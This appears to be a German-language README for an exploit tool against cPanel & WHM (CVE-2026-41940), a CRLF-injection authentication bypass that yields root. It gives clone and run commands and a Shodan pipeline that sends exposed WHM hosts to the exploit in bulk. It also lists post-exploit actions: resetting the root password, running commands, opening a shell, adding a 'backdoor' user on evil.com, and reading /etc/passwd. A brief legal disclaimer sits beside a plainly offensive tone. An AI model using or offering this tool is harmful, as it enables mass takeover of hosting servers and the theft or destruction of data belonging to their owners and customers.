
# cPanel & WHM - Authentifizierungsumgehung durch CRLF-Injektion in Session-Dateien
⚡ Unauthenticated Root – Session‑File CRLF Injection ⚡
„Ein Exploit, um sie alle zu knechten.“
┌─────────────────────────────────────────────────────────────┐
│ Stage 1 ── Mint a pre‑auth session cookie │
│ Stage 2 ── CRLF injection via `Authorization` header │
│ Stage 3 ── Fire `do_token_denied` (raw → cache) │
│ Stage 4 ── Verify WHM root access via JSON API │
└─────────────────────────────────────────────────────────────┘
💥 Ergebnis – Voller Root-Zugriff auf WHM, ohne Anmeldedaten.
Dieses Projekt wird unter der MIT-Lizenz veröffentlicht – du darfst es frei verwenden, modifizieren und verbreiten, aber sei nicht böse 😈.
Details findest du in der Datei LICENSE.
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940
Null Abhängigkeiten – nur die Python-3-Standardbibliothek.
Du brauchst keinpip,virtualenvoder sonstigen Schnickschnack.
./CVE-2026-41940.py -u https://target.com:2087
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30
Sobald du die Box geknackt hast, kannst du:
--action list--action passwd --passwd "h4ck3d!"--action cmd --cmd "id;whoami"--action shell (vollständiges WHM-Terminal)--action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"cat /etc/passwd--action info$ ./CVE-2026-41940.py -u https://192.168.1.100:2087
Configuration:
Targets : 1
Threads : 10
Timeout : 15s
Action : scan only
[10:23:15] [SCAN] Starting 4-stage exploit chain... https://192.168.1.100:2087
[10:23:15] [INFO] Canonical hostname discovered: server.example.com
[10:23:15] [STEP] Stage 1/4 — Minting preauth session...
[10:23:16] [ OK] Stage1: preauth session = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] Stage 2/4 — CRLF injection via Authorization header...
[10:23:17] [ OK] Stage2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)...
[10:23:18] [ OK] Stage3: HTTP 401 — do_token_denied gadget fired
[10:23:18] [STEP] Stage 4/4 — Verifying WHM root access...
[10:23:18] [INFO] Stage4: HTTP 200 {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 CONFIRMED — WHM root access! (v11.118.0.63 — CONFIRMED vulnerable)
[10:23:18] [PWND] Token : /cpsess1234567890
[10:23:18] [PWND] Session : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND] Version : 11.118.0.63
[10:23:18] [PWND] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
CVE-2026-41940 — Scan Complete
Time: 3.2s · Targets: 1
1 VULNERABLE TARGET(S)
[*] Target : https://192.168.1.100:2087
[*] Version : 11.118.0.63
[*] Token : /cpsess1234567890
[*] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
[*] Session : 9a7f8e3d2c1b0a9f
[*] Evidence : {"version":"11.118.0.63",...}
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
Alle Versionen unterhalb dieser Builds sind verwundbar.
0xgh057r3c0n – Sicherheitsforscher, Reverse Engineer und Koffein-Junkie.
GitHub | Twitter
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke gedacht.
Unautorisierter Zugriff auf Computersysteme ist illegal. Der Autor und die Mitwirkenden sind nicht verantwortlich für Missbrauch oder Schäden, die durch diese Software verursacht werden.
Nutze es verantwortungsvoll und hole immer zuerst die Erlaubnis ein.
🔥 Hacke den Planeten, aber bleib legal. 🔥
| Flag | Beschreibung |
|---|
-u, --url | Einzelne Ziel-URL (z. B. https://host:2087) |
-l, --list | Datei mit einer URL pro Zeile |
--hostname | Kanonischen Host-Header überschreiben (automatisch erkannt) |
-t, --threads | Threads (Standard: 10) |
--timeout | Timeout in Sekunden (Standard: 15) |
--rate-limit | Pause zwischen Zielen (Sekunden) |
--action | Post-Exploit: list, passwd, cmd, exec, info, version, shell, adduser |
--passwd | Neues Root-Passwort (mit --action passwd) |
--cmd | OS-Befehl (mit --action cmd/exec) |
--new-user | Neuer cPanel-Benutzername (mit --action adduser) |
--new-domain | Neue cPanel-Domain (mit --action adduser) |
-o, --output | Ergebnisse als JSON speichern |
| Branch | Gepatchter Build | Status |
|---|
| 11.110 | 11.110.0.97 | 🛡️ Behoben |
| 11.118 | 11.118.0.63 | 🛡️ Behoben |
| 11.126 | 11.126.0.54 | 🛡️ Behoben |
| 11.132 | 11.132.0.29 | 🛡️ Behoben |
| 11.134 | 11.134.0.20 | 🛡️ Behoben |
| 11.136 | 11.136.0.5 | 🛡️ Behoben |